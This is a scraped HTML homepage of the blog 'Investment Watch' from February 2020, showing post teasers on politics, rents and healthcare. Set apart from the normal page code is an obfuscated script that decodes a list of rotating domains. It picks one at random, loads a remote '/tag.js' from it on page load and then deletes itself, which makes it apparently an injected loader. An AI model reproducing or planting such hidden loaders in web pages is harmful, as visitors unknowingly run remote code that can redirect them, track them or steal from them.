<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>Investment Watch &#8211; Spreading the truth. Empowering the people.</title>
<link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Investment Watch &raquo; Feed" href="https://www.investmentwatchblog.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Investment Watch &raquo; Comments Feed" href="https://www.investmentwatchblog.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.investmentwatchblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.13"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<!-- managing ads with Advanced Ads --><script>
					advanced_ads_ready=function(){var fns=[],listener,doc=typeof document==="object"&&document,hack=doc&&doc.documentElement.doScroll,domContentLoaded="DOMContentLoaded",loaded=doc&&(hack?/^loaded|^c/:/^loaded|^i|^c/).test(doc.readyState);if(!loaded&&doc){listener=function(){doc.removeEventListener(domContentLoaded,listener);window.removeEventListener("load",listener);loaded=1;while(listener=fns.shift())listener()};doc.addEventListener(domContentLoaded,listener);window.addEventListener("load",listener)}return function(fn){loaded?setTimeout(fn,0):fns.push(fn)}}();
			</script><style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wpsr_main_css-css'  href='https://www.investmentwatchblog.com/wp-content/plugins/wp-socializer/public/css/wpsr.min.css?ver=4.1.9' type='text/css' media='all' />
<link rel='stylesheet' id='wpsr_sb_icon_css-css'  href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=4.1.9' type='text/css' media='all' />
<link rel='stylesheet' id='generate-style-grid-css'  href='https://www.investmentwatchblog.com/wp-content/themes/generatepress/css/unsemantic-grid.min.css?ver=2.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='generate-style-css'  href='https://www.investmentwatchblog.com/wp-content/themes/generatepress/style.min.css?ver=2.1.2' type='text/css' media='all' />
<style id='generate-style-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='generate-mobile-style-css'  href='https://www.investmentwatchblog.com/wp-content/themes/generatepress/css/mobile.min.css?ver=2.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='generate-blog-css'  href='https://www.investmentwatchblog.com/wp-content/plugins/gp-premium/blog/functions/css/style-min.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='generate-menu-logo-css'  href='https://www.investmentwatchblog.com/wp-content/plugins/gp-premium/menu-plus/functions/css/menu-logo.min.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='generate-mobile-header-css'  href='https://www.investmentwatchblog.com/wp-content/plugins/gp-premium/menu-plus/functions/css/mobile-header.min.css?ver=1.6.2' type='text/css' media='all' />
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/advanced-ads/public/assets/js/advanced.js?ver=1.8.29'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var advanced_ads_responsive = {"reload_on_resize":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/advanced-ads-responsive/public/assets/js/script.js?ver=1.7.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var advanced_ads_pro_visitor_conditions = {"referrer_cookie_name":"advanced_ads_pro_visitor_referrer","referrer_exdays":"365","page_impr_cookie_name":"advanced_ads_page_impressions","page_impr_exdays":"3650"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/advanced-ads-pro/modules/advanced-visitor-conditions/inc/conditions.min.js?ver=2.1.4'></script>
<script type='text/javascript' src='https://www.investmentwatchblog.com/wp-content/plugins/advanced-ads-pro/modules/click-fraud-protection/assets/js/cfp.min.js?ver=2.1.4'></script>
<link rel='https://api.w.org/' href='https://www.investmentwatchblog.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.investmentwatchblog.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.investmentwatchblog.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.13" />
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-2133317-5"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-2133317-5');
</script>




<!-- MailMunch for Investment Watch Blog -->
<!-- Paste this code right before the </head> tag on every page of your site. -->
<script src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-mailmunch-site-id="514656" async="async"></script>





<script>    
// Begin editable configuration
  window.ABD = {
    bannerSuppress: false, // Optionally suppress the banner asking the user to disable their adblocker.
    bannerTheme: 'blue', // The bannerTheme of the banner (e.g. 'blue', 'black', 'gray')
    bannerSnoozeTime: 86400, // Set in seconds
    remoteURL: "https://abd.investingchannel.com", // Remote ABD URL for JS bundle fetch and event reporting.
    proxyURL: "/proxy.php" // Proxy URL to use for event and bundle fetching if the remote URL is unreachable.
  };
// End editable configuration

function getBundle(e,n,r){var o=new XMLHttpRequest;o.addEventListener("load",n),o.addEventListener("error",r),o.open("GET",e),o.send()}function handleSuccess(){if(200!=this.status)throw new Error("ABD was able to reach the server but received a non 200:OK response.");var e=document.createElement("script");e.innerHTML=this.responseText,document.body.appendChild(e)}function handleErrorInitial(){getBundle(window.ABD.proxyURL+"?remoteURL="+encodeURIComponent(window.ABD.remoteURL+"/js/bundle.js"),handleSuccess,handleErrorProxy)}function handleErrorProxy(){throw new Error("ABD was unable to fetch the JS component from the remote site or local proxy.")}getBundle(window.ABD.remoteURL+"/js/bundle.js",handleSuccess,handleErrorInitial);

</script>


<script>advads_items = { conditions: {}, display_callbacks: {}, display_effect_callbacks: {}, hide_callbacks: {}, backgrounds: {}, effect_durations: {}, close_functions: {}, showed: [] };</script><style type="text/css" id="advads-layer-custom-css"></style><script type="text/javascript">
		;var advadsCfpQueue = [], advadsCfpExpHours = 3;
		var advadsCfpClickLimit = 3;
		;
		var advadsCfpPath = '';
		var advadsCfpDomain = 'www.investmentwatchblog.com';
		var advadsCfpAd = function( adID ){
			if ( 'undefined' == typeof advadsProCfp ) { advadsCfpQueue.push( adID ) } else { advadsProCfp.addElement( adID ) }
		};
		</script><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="https://www.investmentwatchblog.com/wp-content/uploads/2018/03/logo81-1-150x130.jpg" sizes="32x32" />
<link rel="icon" href="https://www.investmentwatchblog.com/wp-content/uploads/2018/03/logo81-1.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://www.investmentwatchblog.com/wp-content/uploads/2018/03/logo81-1.jpg" />
<meta name="msapplication-TileImage" content="https://www.investmentwatchblog.com/wp-content/uploads/2018/03/logo81-1.jpg" />
		<style type="text/css" id="wp-custom-css">
			.post.sticky .inside-article {
    background: #eee;
}

@media (min-width: 769px) {
    .sidebar.grid-25 {
        width: 395px;
    }

    .content-area.grid-75 {
        width: calc(100% - 395px);
    }
}


@media (max-width: 768px) {
    #right-sidebar {
        display: none;
    }
}

blockquote {
  
    font-style: normal;
}


		</style>
	</head>

<body itemtype='https://schema.org/Blog' itemscope='itemscope' class="home blog post-image-below-header post-image-aligned-center sticky-menu-fade regular-menu-logo menu-logo-enabled mobile-header mobile-header-logo mobile-header-sticky  right-sidebar nav-below-header contained-header separate-containers active-footer-widgets-0 nav-search-enabled nav-aligned-center header-aligned-center dropdown-hover">
	<a class="screen-reader-text skip-link" href="#content" title="Skip to content">Skip to content</a>		<header itemtype="https://schema.org/WPHeader" itemscope="itemscope" id="masthead" class="site-header grid-container grid-parent">
			<div class="inside-header grid-container grid-parent">
							<div class="header-widget">
				<aside id="custom_html-8" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"></div></aside><aside id="custom_html-16" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"></div></aside><aside id="custom_html-12" class="widget_text widget inner-padding widget_custom_html"><div class="textwidget custom-html-widget"></div></aside>			</div>
		<div class="site-branding">
					<h1 class="main-title" itemprop="headline">
				<a href="https://www.investmentwatchblog.com/" rel="home">
					Investment Watch
				</a>
			</h1>
					<p class="site-description">
				Spreading the truth. Empowering the people.
			</p>
				</div>			</div><!-- .inside-header -->
		</header><!-- #masthead -->
				<nav itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" id="mobile-header" class="main-navigation mobile-header-navigation">
			<div class="inside-navigation grid-container grid-parent">
				<form method="get" class="search-form navigation-search" action="https://www.investmentwatchblog.com/">
				<input type="search" class="search-field" value="" name="s" title="Search" />
			</form><div class="site-logo mobile-header-logo">
				<a href="https://www.investmentwatchblog.com/" title="Investment Watch" rel="home">
					<img class="header-image" src="https://www.investmentwatchblog.com/wp-content/uploads/2018/05/logo81.jpg" alt="Investment Watch" />
				</a>
			</div>		<div class="mobile-bar-items">
						<span class="search-item" title="Search">
				<a href="#">
					<span class="screen-reader-text">Search</span>
				</a>
			</span>
		</div><!-- .mobile-bar-items -->
						<button class="menu-toggle" aria-controls="mobile-menu" aria-expanded="false">
										<span class="mobile-menu">Menu</span>
				</button>
						<div id="primary-menu" class="main-nav">
			<ul class="menu sf-menu">
				<li class="page_item page-item-2"><a href="https://www.investmentwatchblog.com/newsletters/">Newsletters</a></li>
<li class="page_item page-item-796053"><a href="https://www.investmentwatchblog.com/contact-us/">Contact US</a></li>
<li class="page_item page-item-795565"><a href="https://www.investmentwatchblog.com/economic-calendar/">Economic Calendar</a></li>
<li class="page_item page-item-795567"><a href="https://www.investmentwatchblog.com/donate/">Donate</a></li>
<li class="page_item page-item-795571"><a href="https://www.investmentwatchblog.com/privacy-policy/">Privacy Policy</a></li>
<li class="search-item" title="Search"><a href="#"><span class="screen-reader-text">Search</span></a></li>			</ul>
		</div><!-- .main-nav -->
					</div><!-- .inside-navigation -->
		</nav><!-- #site-navigation -->
				<nav itemtype="https://schema.org/SiteNavigationElement" itemscope="itemscope" id="site-navigation" class="main-navigation grid-container grid-parent">
			<div class="inside-navigation grid-container grid-parent">
				<div class="site-logo sticky-logo navigation-logo">
				<a href="https://www.investmentwatchblog.com/" title="Investment Watch" rel="home">
					<img class="header-image" src="https://www.investmentwatchblog.com/wp-content/uploads/2018/05/logo81.jpg" alt="Investment Watch" />
				</a>
			</div><form method="get" class="search-form navigation-search" action="https://www.investmentwatchblog.com/">
				<input type="search" class="search-field" value="" name="s" title="Search" />
			</form>		<div class="mobile-bar-items">
						<span class="search-item" title="Search">
				<a href="#">
					<span class="screen-reader-text">Search</span>
				</a>
			</span>
		</div><!-- .mobile-bar-items -->
						<button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">
										<span class="mobile-menu">Menu</span>
				</button>
						<div id="primary-menu" class="main-nav">
			<ul class="menu sf-menu">
				<li class="page_item page-item-2"><a href="https://www.investmentwatchblog.com/newsletters/">Newsletters</a></li>
<li class="page_item page-item-796053"><a href="https://www.investmentwatchblog.com/contact-us/">Contact US</a></li>
<li class="page_item page-item-795565"><a href="https://www.investmentwatchblog.com/economic-calendar/">Economic Calendar</a></li>
<li class="page_item page-item-795567"><a href="https://www.investmentwatchblog.com/donate/">Donate</a></li>
<li class="page_item page-item-795571"><a href="https://www.investmentwatchblog.com/privacy-policy/">Privacy Policy</a></li>
<li class="search-item" title="Search"><a href="#"><span class="screen-reader-text">Search</span></a></li>			</ul>
		</div><!-- .main-nav -->
					</div><!-- .inside-navigation -->
		</nav><!-- #site-navigation -->
		<div class="hide-on-desktop">





</div>


<div style="text-align: center; " id="inves-403231844"><!-- Site: InvestmentWatchBlog.InvestmentWatchBlog, Zone: economics, Size 970x250, Multiple sizes: Yes -->
<script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/970x250,970x90,728x90.js' type='text/javascript' charset='utf-8'></script></div>




﻿<script>var _0x4924=['L3RhZy5qcw==','c3Jj','d3d3LmFwcGxpY2F0aW9udW5pZmllci5jb20=','d3d3LmFwcHJvYWNoZGF0YS5jb20=','d3d3LmFwcHJvYWNoZGF0YS5uZXQ=','d3d3LmFwcGxpY2F0aW9udW5pdHkuY29t','I2J2dHAw','d3d3LmFwcHJvYWNoZGF0YS5pbmZv','d3d3LmFwcGxpY2F0aW9udW5pZmljYXRpb25jb250cm9sbGVyLmNvbQ==','cmVtb3ZlQ2hpbGQ=','d3d3LnRyYW5zYWN0aW9udW5pZmljYXRpb24uY29t','cmFuZG9t','bG9jYWxTdG9yYWdl','dGV4dC9qYXZhc2NyaXB0','d3d3LmFwcHJvYWNoZGF0YS5vcmc=','aHR0cHM6Ly8=','Zmxvb3I=','YXBwZW5kQ2hpbGQ=','d3d3LmRhdGF1bmlmaWNhdGlvbi5uZXQ=','dHlwZQ==','d3d3LnRyYW5zYWN0aW9udW5pZmljYXRpb24ubmV0','d3d3LmFwcHVuaWZpY2F0aW9uLm5ldA==','bGVuZ3Ro','d3d3LnJlcXVlc3R1bmlmaWNhdGlvbi5jb20=','cGFyZW50Tm9kZQ==','d3d3LmFwcHVuaWZpY2F0aW9uLm9yZw==','aGVhZA==','Z2V0SXRlbQ==','d3d3LmFwcHVuaWZpY2F0aW9uLmNvbQ==','c2NyaXB0','Y3VycmVudFNjcmlwdA==','d3d3LmRhdGF1bmlmaWNhdGlvbi5jb20=','I2tzdmIx','Z2V0VGltZQ==','b25sb2Fk','Y3JlYXRlRWxlbWVudA==','c2V0SXRlbQ=='];(function(_0x2b30b0,_0x5f0eee){var _0x1fa86f=function(_0x11af64){while(--_0x11af64){_0x2b30b0['push'](_0x2b30b0['shift']());}};_0x1fa86f(++_0x5f0eee);}(_0x4924,0x6c));var _0x3b7e=function(_0x2b30b0,_0x5f0eee){_0x2b30b0=_0x2b30b0-0x0;var _0x1fa86f=_0x4924[_0x2b30b0];if(_0x3b7e['UjxRlp']===undefined){var _0x11af64=function(){var _0x5e31de=function(){var _0x1b8e21;try{_0x1b8e21=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x2be464){_0x1b8e21=window;}return _0x1b8e21;};var _0x52c156=_0x5e31de();var _0x48bd46='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var _0x3f9d8a=String['fromCharCode']['bind'](String);var _0x145e26=String['prototype']['indexOf'];var _0x11f98d=String['prototype']['replace'];_0x52c156['atob']||(_0x52c156['atob']=function(_0x12a8ca){var _0x37f315=_0x11f98d['call'](String(_0x12a8ca),/=+$/,'');var _0x5b9eab='';for(var _0x21be3c=0x0,_0x115e3a,_0xcfb8f9,_0x5e2e9f=0x0;_0xcfb8f9=_0x37f315['charAt'](_0x5e2e9f++);~_0xcfb8f9&&(_0x115e3a=_0x21be3c%0x4?_0x115e3a*0x40+_0xcfb8f9:_0xcfb8f9,_0x21be3c++%0x4)?_0x5b9eab+=_0x3f9d8a(0xff&_0x115e3a>>(-0x2*_0x21be3c&0x6)):0x0){_0xcfb8f9=_0x145e26['call'](_0x48bd46,_0xcfb8f9);}return _0x5b9eab;});return _0x52c156['atob'];}();var _0x51ac48=decodeURIComponent;var _0x58ed57=String['prototype']['charCodeAt'];var _0x30b0d7=String['prototype']['slice'];_0x3b7e['mKmvGY']=function(_0x2795d0){var _0x42ee2c=_0x11af64(_0x2795d0);var _0x4fc7ef=[];for(var _0x363c97=0x0,_0x3ae0c1=_0x42ee2c['length'];_0x363c97<_0x3ae0c1;_0x363c97++){_0x4fc7ef+='%'+_0x30b0d7['call']('00'+_0x58ed57['call'](_0x42ee2c,_0x363c97)['toString'](0x10),-0x2);}return _0x51ac48(_0x4fc7ef);};_0x3b7e['TiUOvn']={};_0x3b7e['UjxRlp']=!![];}var _0xe0764b=_0x3b7e['TiUOvn'][_0x2b30b0];if(_0xe0764b===undefined){_0x1fa86f=_0x3b7e['mKmvGY'](_0x1fa86f);_0x3b7e['TiUOvn'][_0x2b30b0]=_0x1fa86f;}else{_0x1fa86f=_0xe0764b;}return _0x1fa86f;};(function(){var _0x2d007b=[_0x3b7e('0xb'),_0x3b7e('0x5'),_0x3b7e('0x8'),_0x3b7e('0x6'),_0x3b7e('0xa'),_0x3b7e('0x7'),_0x3b7e('0x11'),_0x3b7e('0x1f'),_0x3b7e('0x18'),_0x3b7e('0x1c'),_0x3b7e('0x22'),_0x3b7e('0x15'),_0x3b7e('0x1a'),_0x3b7e('0xd'),_0x3b7e('0x17')];var _0x17a9f3=function(_0x2b36b6,_0xd97628,_0x976a18){var _0x237e48=document[_0x3b7e('0x1')](_0x3b7e('0x20'));_0x237e48[_0x3b7e('0x16')]=_0x3b7e('0x10');_0x237e48[_0x3b7e('0x4')]=_0x3b7e('0x12')+_0x2b36b6+_0xd97628;_0x237e48[_0x3b7e('0x0')]=function(){_0x976a18&&_0x976a18();document[_0x3b7e('0x1d')][_0x3b7e('0xc')](_0x237e48);};document[_0x3b7e('0x1d')][_0x3b7e('0x14')](_0x237e48);};var _0x222fc1=function(){var _0x798e3e=document[_0x3b7e('0x21')];var _0x707d4b=_0x798e3e[_0x3b7e('0x1b')];_0x707d4b[_0x3b7e('0xc')](_0x798e3e);};var _0x4a87ff=function(_0xfa57f){return Math[_0x3b7e('0x13')](Math[_0x3b7e('0xe')]()*_0xfa57f);};var _0x105e24=function(){return Math[_0x3b7e('0x13')](new Date()[_0x3b7e('0x24')]()/0x3e8);};var _0xbdf9e9=function(_0x34d092){var _0x15c1e6=0x3c*0x3c*0x18*0x1e;var _0x5490bd=_0x3b7e('0x9');var _0x436572=_0x3b7e('0x23');var _0x2a4c0=window[_0x3b7e('0xf')][_0x3b7e('0x1e')](_0x5490bd);var _0x2b0f78=window[_0x3b7e('0xf')][_0x3b7e('0x1e')](_0x436572);if(_0x2a4c0>=_0x34d092||_0x2a4c0===null||_0x2b0f78===null||_0x105e24()>_0x2b0f78){_0x2a4c0=_0x4a87ff(_0x34d092);window[_0x3b7e('0xf')][_0x3b7e('0x2')](_0x5490bd,_0x2a4c0);window[_0x3b7e('0xf')][_0x3b7e('0x2')](_0x436572,_0x105e24()+_0x15c1e6);}return _0x2a4c0;};_0x17a9f3(_0x2d007b[_0xbdf9e9(_0x2d007b[_0x3b7e('0x19')])],_0x3b7e('0x3'));_0x222fc1();}());</script>
	<div id="page" class="hfeed site grid-container container grid-parent">
		<div id="content" class="site-content">
			
	<div id="primary" class="content-area grid-parent mobile-grid-100 grid-75 tablet-grid-75">
		<main id="main" class="site-main">
			<article id="post-975616" class="post-975616 post type-post status-publish format-standard sticky hentry category-featured-articles tag-bloomberg tag-cancer tag-denied tag-should tag-treatments" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/bloomberg-says-a-95-year-old-with-cancer-should-be-denied-treatments/" rel="bookmark">Bloomberg says a 95 year old with cancer should be denied treatments</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/bloomberg-says-a-95-year-old-with-cancer-should-be-denied-treatments/" title="8:14 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:14:29+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Bloomberg explaining how healthcare will “bankrupt us,” unless we deny care to the elderly. “If you show up with cancer &amp; you’re 95 years old, we should say&#8230;there’s no cure, &#8230; <a title="Bloomberg says a 95 year old with cancer should be denied treatments" class="read-more" href="https://www.investmentwatchblog.com/bloomberg-says-a-95-year-old-with-cancer-should-be-denied-treatments/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bloomberg/" rel="tag">bloomberg</a>, <a href="https://www.investmentwatchblog.com/tag/cancer/" rel="tag">cancer</a>, <a href="https://www.investmentwatchblog.com/tag/denied/" rel="tag">denied</a>, <a href="https://www.investmentwatchblog.com/tag/should/" rel="tag">should</a>, <a href="https://www.investmentwatchblog.com/tag/treatments/" rel="tag">treatments</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975499" class="post-975499 post type-post status-publish format-standard sticky hentry category-featured-articles tag-economic tag-housing tag-income tag-renters tag-spending tag-their" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/economic-woes-1-in-4-renters-spending-over-half-their-income-on-housing/" rel="bookmark">ECONOMIC WOES: 1 In 4 Renters Spending Over Half Their Income On Housing</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/economic-woes-1-in-4-renters-spending-over-half-their-income-on-housing/" title="10:56 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T10:56:38+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>by Mac Slavo of SHTFplan Rents are becoming unaffordable for many Americans, even those in the middle class. Because the cost of buying property, maintaining it, and covering property taxes has jumped, so &#8230; <a title="ECONOMIC WOES: 1 In 4 Renters Spending Over Half Their Income On Housing" class="read-more" href="https://www.investmentwatchblog.com/economic-woes-1-in-4-renters-spending-over-half-their-income-on-housing/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/economic/" rel="tag">economic</a>, <a href="https://www.investmentwatchblog.com/tag/housing/" rel="tag">housing</a>, <a href="https://www.investmentwatchblog.com/tag/income/" rel="tag">income</a>, <a href="https://www.investmentwatchblog.com/tag/renters/" rel="tag">renters</a>, <a href="https://www.investmentwatchblog.com/tag/spending/" rel="tag">spending</a>, <a href="https://www.investmentwatchblog.com/tag/their/" rel="tag">their</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975498" class="post-975498 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-candidates tag-democratic tag-moderates" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/none-of-the-democratic-candidates-are-moderates/" rel="bookmark">None of the Democratic candidates are moderates</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/none-of-the-democratic-candidates-are-moderates/" title="10:51 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T10:51:37+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/none-of-the-democratic-candidates-are-moderates/">
				<img width="398" height="275" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Glorious-Revolutionary-Future-Dreamstime-104953755.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Glorious-Revolutionary-Future-Dreamstime-104953755.jpg 398w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Glorious-Revolutionary-Future-Dreamstime-104953755-300x207.jpg 300w" sizes="(max-width: 398px) 100vw, 398px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by Fabius Maximus  Summary: Let’s look at the cosplay festival that is Campaign 2020, as the candidates pretend to be what they are not. Their voting records tell the true tale &#8230; <a title="None of the Democratic candidates are moderates" class="read-more" href="https://www.investmentwatchblog.com/none-of-the-democratic-candidates-are-moderates/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/candidates/" rel="tag">candidates</a>, <a href="https://www.investmentwatchblog.com/tag/democratic/" rel="tag">democratic</a>, <a href="https://www.investmentwatchblog.com/tag/moderates/" rel="tag">moderates</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975502" class="post-975502 post type-post status-publish format-standard sticky hentry category-featured-articles tag-139th tag-after tag-barry tag-charles tag-cracker tag-money tag-shouts" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/i-take-200-300-a-day-of-your-money-cracker-you-cant-stop-me-shouts-charles-barry-after-his-139th-known-arrest-he-praises-nys-bail-reform-la/" rel="bookmark">“I take $200, $300 a day of your money, cracker! You can’t stop me!” shouts Charles Barry after his 139th known arrest. He praises NY’s “bail reform” law, and the Democrats behind it.</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/i-take-200-300-a-day-of-your-money-cracker-you-cant-stop-me-shouts-charles-barry-after-his-139th-known-arrest-he-praises-nys-bail-reform-la/" title="10:42 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T10:42:22+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Andy Ngo Verified account @MrAndyNgo “I take $200, $300 a day of your money, cracker! You can’t stop me!” shouts Charles Barry after his 139th known arrest. He praises NY’s “bail &#8230; <a title="“I take $200, $300 a day of your money, cracker! You can’t stop me!” shouts Charles Barry after his 139th known arrest. He praises NY’s “bail reform” law, and the Democrats behind it." class="read-more" href="https://www.investmentwatchblog.com/i-take-200-300-a-day-of-your-money-cracker-you-cant-stop-me-shouts-charles-barry-after-his-139th-known-arrest-he-praises-nys-bail-reform-la/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/139th/" rel="tag">139th</a>, <a href="https://www.investmentwatchblog.com/tag/after/" rel="tag">after</a>, <a href="https://www.investmentwatchblog.com/tag/barry/" rel="tag">barry</a>, <a href="https://www.investmentwatchblog.com/tag/charles/" rel="tag">charles</a>, <a href="https://www.investmentwatchblog.com/tag/cracker/" rel="tag">cracker</a>, <a href="https://www.investmentwatchblog.com/tag/money/" rel="tag">money</a>, <a href="https://www.investmentwatchblog.com/tag/shouts/" rel="tag">shouts</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<div class="inves-homepage-desktop-6th-article" id="inves-1288398940"><script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/300x250.js' type='text/javascript' charset='utf-8'></script>  

